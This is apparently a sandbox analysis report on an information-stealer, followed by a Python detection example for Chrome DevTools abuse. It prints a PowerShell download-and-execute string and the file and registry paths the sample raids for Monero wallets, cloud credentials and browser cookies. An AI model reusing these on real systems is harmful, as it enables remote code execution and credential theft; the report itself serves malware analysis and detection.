                          • Opcode Fuzzy Hash: 2d3bf161d34f9c029443e772bbeea8bcab67a9152da7f9cbd75d4c6a8e3cd353
                          • Instruction Fuzzy Hash: 4202B170A11A26AFCB21EF69D899AEE77F6BF44300F044128F84A97350DB38DD458BD4
                          APIs
                            • Part of subcall function 00621120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00621135
                            • Part of subcall function 00621120: RtlAllocateHeap.NTDLL(00000000), ref: 0062113C
                            • Part of subcall function 00621120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00621159
                            • Part of subcall function 00621120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00621173
                            • Part of subcall function 00621120: RegCloseKey.ADVAPI32(?), ref: 0062117D
                          • lstrcat.KERNEL32(?,00000000), ref: 006211C0
                          • lstrlen.KERNEL32(?), ref: 006211CD
                          • lstrcat.KERNEL32(?,.keys), ref: 006211E8
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0062121F
                          • lstrlen.KERNEL32(01298B40), ref: 0062122D
                          • lstrcpy.KERNEL32(00000000,?), ref: 00621251
                          • lstrcat.KERNEL32(00000000,01298B40), ref: 00621259
                          • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 00621264
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00621288
                          • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 00621294
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006212BA
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 006212FF
                          • lstrlen.KERNEL32(0129CEA8), ref: 0062130E
                          • lstrcpy.KERNEL32(00000000,?), ref: 00621335
                          • lstrcat.KERNEL32(00000000,?), ref: 0062133D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00621378
                          • lstrcat.KERNEL32(00000000), ref: 00621385
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006213AC
                          • CopyFileA.KERNEL32(?,?,00000001), ref: 006213D5
                          • lstrcpy.KERNEL32(00000000,?), ref: 00621401
                          • lstrcpy.KERNEL32(00000000,?), ref: 0062143D
                            • Part of subcall function 0063EDE0: lstrcpy.KERNEL32(00000000,?), ref: 0063EE12
                          • DeleteFileA.KERNEL32(?), ref: 00621471
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                          • String ID: .keys$\Monero\wallet.keys
                          • API String ID: 2881711868-3586502688
                          • Opcode ID: 039856fd30b42d9fc5bc844ff3e88d7dbce335411f3dbeedeb74053f566ddab4
                          • Instruction ID: dcbe8ad7c965ca6fd3c290cbc5a88aa4ecf055a1152bcaac32fdc5c48b17ce38
                          • Opcode Fuzzy Hash: 039856fd30b42d9fc5bc844ff3e88d7dbce335411f3dbeedeb74053f566ddab4
                          • Instruction Fuzzy Hash: 5AA1A271A01A26ABCB61EB75EC4AADE77BBBF55301F040128F805E7241DB34DE418F94
                          APIs
                          • memset.MSVCRT ref: 0063E740
                          • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 0063E769
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063E79F
                          • lstrcat.KERNEL32(?,00000000), ref: 0063E7AD
                          • lstrcat.KERNEL32(?,\.azure\), ref: 0063E7C6
                          • memset.MSVCRT ref: 0063E805
                          • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 0063E82D
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063E85F
                          • lstrcat.KERNEL32(?,00000000), ref: 0063E86D
                          • lstrcat.KERNEL32(?,\.aws\), ref: 0063E886
                          • memset.MSVCRT ref: 0063E8C5
                          • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0063E8F1
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063E920
                          • lstrcat.KERNEL32(?,00000000), ref: 0063E92E
                          • lstrcat.KERNEL32(?,\.IdentityService\), ref: 0063E947
                          • memset.MSVCRT ref: 0063E986
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$memset$FolderPathlstrcpy
                          • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                          • API String ID: 4067350539-3645552435
                          • Opcode ID: 513819f096f9a955585085362aa07ab0e608c8c42abd5fc6c0af5fda0e1f5d17
                          • Instruction ID: 01684101bd4e1bcef3c9a543770e99d99c18f4c03c15314366f548feebead7a2
                          • Opcode Fuzzy Hash: 513819f096f9a955585085362aa07ab0e608c8c42abd5fc6c0af5fda0e1f5d17
                          • Instruction Fuzzy Hash: 3C71EA71E40629ABDB61EB64DC46FED7376BF48701F010898B7199B1C0DE749E848FA8
                          APIs
                          • lstrcpy.KERNEL32 ref: 0063ABCF
                          • lstrlen.KERNEL32(0129D978), ref: 0063ABE5
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063AC0D
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0063AC18
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063AC41
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063AC84
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0063AC8E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063ACB7
                          • lstrlen.KERNEL32(00654AD4), ref: 0063ACD1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063ACF3
                          • lstrcat.KERNEL32(00000000,00654AD4), ref: 0063ACFF
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063AD28
                          • lstrlen.KERNEL32(00654AD4), ref: 0063AD3A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063AD5C
                          • lstrcat.KERNEL32(00000000,00654AD4), ref: 0063AD68
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063AD91
                          • lstrlen.KERNEL32(0129DAB0), ref: 0063ADA7
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063ADCF
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0063ADDA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063AE03
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063AE3F
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0063AE49
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063AE6F
                          • lstrlen.KERNEL32(00000000), ref: 0063AE85
                          • lstrcpy.KERNEL32(00000000,0129D948), ref: 0063AEB8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen
                          • String ID: f
                          • API String ID: 2762123234-1993550816
                          • Opcode ID: dfb44f0a8c66324055a445a9a6175ae08c531c91825d155bc5f1affb09b68a95
                          • Instruction ID: ed80f933ed6c4c4c55478e39b72f07e9e5b72a57edc7de26c6ab1e87108b9beb
                          • Opcode Fuzzy Hash: dfb44f0a8c66324055a445a9a6175ae08c531c91825d155bc5f1affb09b68a95
                          • Instruction Fuzzy Hash: 13B17E70910A27ABCB62EFA4EC49AEEB3B7BF00301F040528E85597A55DB38DD41DBD5
                          APIs
                          • LoadLibraryA.KERNEL32(ws2_32.dll,?,006372A4), ref: 006447E6
                          • GetProcAddress.KERNEL32(00000000,connect), ref: 006447FC
                          • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 0064480D
                          • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0064481E
                          • GetProcAddress.KERNEL32(00000000,htons), ref: 0064482F
                          • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 00644840
                          • GetProcAddress.KERNEL32(00000000,recv), ref: 00644851
                          • GetProcAddress.KERNEL32(00000000,socket), ref: 00644862
                          • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 00644873
                          • GetProcAddress.KERNEL32(00000000,closesocket), ref: 00644884
                          • GetProcAddress.KERNEL32(00000000,send), ref: 00644895
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                          • API String ID: 2238633743-3087812094
                          • Opcode ID: 909d8d3e3f5cf324647fcedc18529f5c668babf4471249fcfdc212dc65407c59
                          • Instruction ID: 2911e75700fb5e8ef2bcb8a2ec817f2c41415f08b8a98c3c824e41ae98c90390
                          • Opcode Fuzzy Hash: 909d8d3e3f5cf324647fcedc18529f5c668babf4471249fcfdc212dc65407c59
                          • Instruction Fuzzy Hash: D1117C71952F10EBC7209FB4AC1EA563EB9BA097477050C1BF992E61A0EBFC4404EF50
                          APIs
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0063BE53
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0063BE86
                          • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 0063BE91
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063BEB1
                          • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 0063BEBD
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063BEE0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0063BEEB
                          • lstrlen.KERNEL32(')"), ref: 0063BEF6
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063BF13
                          • lstrcat.KERNEL32(00000000,')"), ref: 0063BF1F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063BF46
                          • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 0063BF66
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063BF88
                          • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 0063BF94
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063BFBA
                          • ShellExecuteEx.SHELL32(?), ref: 0063C00C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                          • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          • API String ID: 4016326548-898575020
                          • Opcode ID: 1280a4fd26ecd29431954927c62c1034e2e4aff1a9b84e3e9ec3eca47362be16
                          • Instruction ID: bc00a75fb97d52fb74938ea63644fbf2fcfe4ade418cfd800decf9da0f70e98c
                          • Opcode Fuzzy Hash: 1280a4fd26ecd29431954927c62c1034e2e4aff1a9b84e3e9ec3eca47362be16
                          • Instruction Fuzzy Hash: BD61A471E11626ABCB51AFB59C4A5EE7BABBF04301F042429F549E3341DB38C9458F94
                          APIs
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0064184F
                          • lstrlen.KERNEL32(01286188), ref: 00641860
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00641887
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00641892
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006418C1
                          • lstrlen.KERNEL32(00654FA0), ref: 006418D3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006418F4
                          • lstrcat.KERNEL32(00000000,00654FA0), ref: 00641900
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0064192F
                          • lstrlen.KERNEL32(01286038), ref: 00641945
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0064196C
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00641977
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006419A6
                          • lstrlen.KERNEL32(00654FA0), ref: 006419B8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006419D9
                          • lstrcat.KERNEL32(00000000,00654FA0), ref: 006419E5
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00641A14
                          • lstrlen.KERNEL32(012860B8), ref: 00641A2A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00641A51
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00641A5C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00641A8B
                          • lstrlen.KERNEL32(012860D8), ref: 00641AA1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00641AC8
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00641AD3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00641B02
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcatlstrlen
                          • String ID:
                          • API String ID: 1049500425-0
                          • Opcode ID: c44ab61920652edfe426ac26de7bd011eefa31b1a0aa51e5bae535faf2610453
                          • Instruction ID: 3fdcd2b3eb0710079df826c337ff6eda8bc277c378940afeca27db1a7ad17dc4
                          • Opcode Fuzzy Hash: c44ab61920652edfe426ac26de7bd011eefa31b1a0aa51e5bae535faf2610453
                          • Instruction Fuzzy Hash: 9F914FB0A01B07EFD720AFB6DC98A5A77EABF05301B145829E886D7751DB38D881CB50
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 00634793
                          • LocalAlloc.KERNEL32(00000040,?), ref: 006347C5
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00634812
                          • lstrlen.KERNEL32(00654B60), ref: 0063481D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063483A
                          • lstrcat.KERNEL32(00000000,00654B60), ref: 00634846
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063486B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00634898
                          • lstrcat.KERNEL32(00000000,00000000), ref: 006348A3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006348CA
                          • StrStrA.SHLWAPI(?,00000000), ref: 006348DC
                          • lstrlen.KERNEL32(?), ref: 006348F0
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00634931
                          • lstrcpy.KERNEL32(00000000,?), ref: 006349B8
                          • lstrcpy.KERNEL32(00000000,?), ref: 006349E1
                          • lstrcpy.KERNEL32(00000000,?), ref: 00634A0A
                          • lstrcpy.KERNEL32(00000000,?), ref: 00634A30
                          • lstrcpy.KERNEL32(00000000,?), ref: 00634A5D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                          • String ID: ^userContextId=4294967295$moz-extension+++
                          • API String ID: 4107348322-3310892237
                          • Opcode ID: 221e44cae56e7b7451e9a1aa254d69aacbb0a7d63321ba69aa8d4b1a537cf240
                          • Instruction ID: 8e76a529e218a8b16a26713bf69291e4aee238642072b762e2a6c2b56e52b162
                          • Opcode Fuzzy Hash: 221e44cae56e7b7451e9a1aa254d69aacbb0a7d63321ba69aa8d4b1a537cf240
                          • Instruction Fuzzy Hash: C4B1C171A11A26ABCB61EF75E896ADEB7B7AF40300F040528F846A7715DF34EC058BD4
                          APIs
                            • Part of subcall function 006290C0: InternetOpenA.WININET(0064CFEC,00000001,00000000,00000000,00000000), ref: 006290DF
                            • Part of subcall function 006290C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 006290FC
                            • Part of subcall function 006290C0: InternetCloseHandle.WININET(00000000), ref: 00629109
                          • strlen.MSVCRT ref: 006292E1
                          • strlen.MSVCRT ref: 006292FA
                            • Part of subcall function 00628980: std::_Xinvalid_argument.LIBCPMT ref: 00628996
                          • strlen.MSVCRT ref: 00629399
                          • strlen.MSVCRT ref: 006293E6
                          • lstrcat.KERNEL32(?,cookies), ref: 00629547
                          • lstrcat.KERNEL32(?,00651794), ref: 00629559
                          • lstrcat.KERNEL32(?,?), ref: 0062956A
                          • lstrcat.KERNEL32(?,00654B98), ref: 0062957C
                          • lstrcat.KERNEL32(?,?), ref: 0062958D
                          • lstrcat.KERNEL32(?,.txt), ref: 0062959F
                          • lstrlen.KERNEL32(?), ref: 006295B6
                          • lstrlen.KERNEL32(?), ref: 006295DB
                          • lstrcpy.KERNEL32(00000000,?), ref: 00629614
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                          • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                          • API String ID: 1201316467-3542011879
                          • Opcode ID: ca6687e8d2236c293933d46f808e27a3503c825d27abec0cd500c723ce4cd0d4
                          • Instruction ID: 1d67646afcbddff51af1ed5ab4daccb880e6ef8ddac78a441b86f3223bfb4098
                          • Opcode Fuzzy Hash: ca6687e8d2236c293933d46f808e27a3503c825d27abec0cd500c723ce4cd0d4
                          • Instruction Fuzzy Hash: C5E13970E00629EFDF50DFA8E891ADDBBB6BF48301F1045A9E509A7241DB349E45CFA4
                          APIs
                          • memset.MSVCRT ref: 0063D9A1
                          • memset.MSVCRT ref: 0063D9B3
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0063D9DB
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063DA0E
                          • lstrcat.KERNEL32(?,00000000), ref: 0063DA1C
                          • lstrcat.KERNEL32(?,0129DA98), ref: 0063DA36
                          • lstrcat.KERNEL32(?,?), ref: 0063DA4A
                          • lstrcat.KERNEL32(?,0129CED8), ref: 0063DA5E
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063DA8E
                          • GetFileAttributesA.KERNEL32(00000000), ref: 0063DA95
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0063DAFE
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                          • String ID:
                          • API String ID: 2367105040-0
                          • Opcode ID: 983ead807553b9ca5ba43a5e820e6ff39dc043996aac329aef7a65ce466ac239
                          • Instruction ID: 2205de0faeded845f78005fec18f478ebc959f65148fe5adea9f8ff6991cd792
                          • Opcode Fuzzy Hash: 983ead807553b9ca5ba43a5e820e6ff39dc043996aac329aef7a65ce466ac239
                          • Instruction Fuzzy Hash: 38B19FB1D10629AFCB10EFA4EC959EE77BABF48301F044969F946A7240DA349E45CF90
                          APIs
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0062B330
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062B37E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062B3A9
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0062B3B1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062B3D9
                          • lstrlen.KERNEL32(00654C50), ref: 0062B450
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062B474
                          • lstrcat.KERNEL32(00000000,00654C50), ref: 0062B480
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062B4A9
                          • lstrlen.KERNEL32(00000000), ref: 0062B52D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062B557
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0062B55F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062B587
                          • lstrlen.KERNEL32(00654AD4), ref: 0062B5FE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062B622
                          • lstrcat.KERNEL32(00000000,00654AD4), ref: 0062B62E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062B65E
                          • lstrlen.KERNEL32(?), ref: 0062B767
                          • lstrlen.KERNEL32(?), ref: 0062B776
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062B79E
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$lstrcat
                          • String ID:
                          • API String ID: 2500673778-0
                          • Opcode ID: ea5739347be183b842a6a158094189a71fecc20325e6ba4751cf78ba42f1b80e
                          • Instruction ID: d1a88ddb4c27880d786d3a7fc2946bd6378334eab53b83cc818a293734ec421a
                          • Opcode Fuzzy Hash: ea5739347be183b842a6a158094189a71fecc20325e6ba4751cf78ba42f1b80e
                          • Instruction Fuzzy Hash: D3024D70A01A22CFCB25DF65E899AAAB7B2FF44305F18906DE4099B361D735DC42CF80
                          APIs
                            • Part of subcall function 006471E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 006471FE
                          • RegOpenKeyExA.ADVAPI32(?,0129B030,00000000,00020019,?), ref: 006437BD
                          • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 006437F7
                          • wsprintfA.USER32 ref: 00643822
                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00643840
                          • RegCloseKey.ADVAPI32(?), ref: 0064384E
                          • RegCloseKey.ADVAPI32(?), ref: 00643858
                          • RegQueryValueExA.ADVAPI32(?,0129DF60,00000000,000F003F,?,?), ref: 006438A1
                          • lstrlen.KERNEL32(?), ref: 006438B6
                          • RegQueryValueExA.ADVAPI32(?,0129DFD8,00000000,000F003F,?,00000400), ref: 00643927
                          • RegCloseKey.ADVAPI32(?), ref: 00643972
                          • RegCloseKey.ADVAPI32(?), ref: 00643989
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Similarity
                          • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                          • String ID: - $%s\%s$?
                          • API String ID: 13140697-3278919252
                          • Opcode ID: bf7816092e05c894f3796956cdbd1ee406766652b73f0d2c2c08667f03b7adac
                          • Instruction ID: d78d3c953346a860f971ec5aa1e2bd5a5527e7f553f6ac7105c660f5207c53c4
                          • Opcode Fuzzy Hash: bf7816092e05c894f3796956cdbd1ee406766652b73f0d2c2c08667f03b7adac
                          • Instruction Fuzzy Hash: BB91ACB2900218DFCB10DFA4DD809EEBBBAFB48311F148569E509A7351DB35AE45CFA0
                          APIs
                          • InternetOpenA.WININET(0064CFEC,00000001,00000000,00000000,00000000), ref: 006290DF
                          • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 006290FC
                          • InternetCloseHandle.WININET(00000000), ref: 00629109
                          • InternetReadFile.WININET(?,?,?,00000000), ref: 00629166
                          • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00629197
                          • InternetCloseHandle.WININET(00000000), ref: 006291A2
                          • InternetCloseHandle.WININET(00000000), ref: 006291A9
                          • strlen.MSVCRT ref: 006291BA
                          • strlen.MSVCRT ref: 006291ED
                          • strlen.MSVCRT ref: 0062922E
                          • strlen.MSVCRT ref: 0062924C
                            • Part of subcall function 00628980: std::_Xinvalid_argument.LIBCPMT ref: 00628996
                           Memory Dump Source
                           • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                           • Associated: the same sixteen memory regions listed for the first function above
                           Joe Sandbox IDA Plugin
                           • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Similarity
                          • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                          • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                          • API String ID: 1530259920-2144369209
                          • Opcode ID: f6117dea67ad9f86d294322a921a13b62c4ee2e19f55a524c37abf75fa8bbf1e
                          • Instruction ID: 37b6b0e70f83d129eb8213b9697514066b9dad0e9fc84d45af94df6915527147
                          • Opcode Fuzzy Hash: f6117dea67ad9f86d294322a921a13b62c4ee2e19f55a524c37abf75fa8bbf1e
                          • Instruction Fuzzy Hash: 6551A471600205ABD720DFA8EC45BDEB7BBEF88715F140169F905E3280DBB49A488BA5
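The routine at 0x006290DF is the most telling one in this section: it fetches http://localhost:9229/json over WinINet and then scans the reply with plain strlen-style string handling for the literals `"webSocketDebuggerUrl":` and `"ws://`. That URL is the discovery document of the Chrome DevTools Protocol, served on the loopback interface by Chromium and Electron when they are started with a remote-debugging port and by the Node.js inspector, whose default port is 9229. A process that is neither a browser nor a developer tool asking for this document is the thing a defender wants to catch. How the sample gets a listener onto that port is not visible in this section and is not claimed here. The Python below is an added example written for this page, not code from the sample or from Joe Sandbox: it reproduces the substring scan the strings imply, shows the same extraction done with a real JSON parser, and flags the loopback discovery request in API-trace lines written in this report's own format. The discovery document is constructed (the id, port and URLs in it are invented); the first two trace lines are copied from this page and the third is a made-up benign request for contrast.

```python
import json
import re
from urllib.parse import urlsplit

# Constructed /json discovery document. Field names follow the real CDP
# discovery schema; the id, port and URLs are invented for this example.
SAMPLE_DISCOVERY = json.dumps([
    {
        "description": "",
        "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/ABC123",
        "id": "ABC123",
        "title": "New Tab",
        "type": "page",
        "url": "about:blank",
        "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/ABC123",
    }
])

# Constructed API-trace lines in the report's own format: the first two are
# copied from this page, the third is a made-up benign request for contrast.
SAMPLE_TRACE = [
    "InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 006290FC",
    "InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 00626B6A",
    "InternetOpenUrlA.WININET(00000000,http://example.invalid/json,00000000,00000000,80000000,00000000), ref: 00000000",
]

KEY = '"webSocketDebuggerUrl":'


def extract_ws_urls_like_sample(body: str) -> list[str]:
    """Mimic what the strings in the 0x006290DF routine imply: scan for the
    literal '"webSocketDebuggerUrl":', then the next '"ws://', and copy up to
    the closing quote. No JSON parser, only strlen/strstr-style scanning."""
    urls: list[str] = []
    pos = 0
    while (k := body.find(KEY, pos)) >= 0:
        start = body.find('"ws://', k)
        if start < 0:
            break
        start += 1                      # drop the opening quote
        end = body.find('"', start)
        if end < 0:
            break
        urls.append(body[start:end])
        pos = end
    return urls


def extract_ws_urls(body: str) -> list[str]:
    """Same result obtained properly: parse the JSON array and read the field."""
    try:
        targets = json.loads(body)
    except ValueError:
        return []
    if not isinstance(targets, list):
        return []
    return [t["webSocketDebuggerUrl"] for t in targets
            if isinstance(t, dict) and isinstance(t.get("webSocketDebuggerUrl"), str)]


LOOPBACK_HOSTS = {"localhost", "127.0.0.1", "::1"}
DISCOVERY_PATHS = {"/json", "/json/list", "/json/version"}


def is_devtools_discovery(url: str) -> bool:
    """True when a URL is a loopback request for the CDP discovery document.
    A non-browser process fetching this is the hunting signal."""
    parts = urlsplit(url.strip())
    if parts.scheme != "http":
        return False
    host = (parts.hostname or "").lower()
    return host in LOOPBACK_HOSTS and parts.path.rstrip("/") in DISCOVERY_PATHS


# Matches the report's "InternetOpenUrlA.WININET(hInternet,url,...), ref: addr" lines.
TRACE_RE = re.compile(
    r"InternetOpenUrlA\.WININET\([^,]*,(?P<url>[^,]+),.*ref: (?P<ref>[0-9A-Fa-f]+)")


def flag_discovery_requests(trace_lines: list[str]) -> list[tuple[str, str]]:
    """Return (ref, url) for each trace line that opens the discovery URL."""
    hits: list[tuple[str, str]] = []
    for line in trace_lines:
        m = TRACE_RE.search(line)
        if m and is_devtools_discovery(m.group("url")):
            hits.append((m.group("ref"), m.group("url")))
    return hits


if __name__ == "__main__":
    print(extract_ws_urls_like_sample(SAMPLE_DISCOVERY))
    print(flag_discovery_requests(SAMPLE_TRACE))
```

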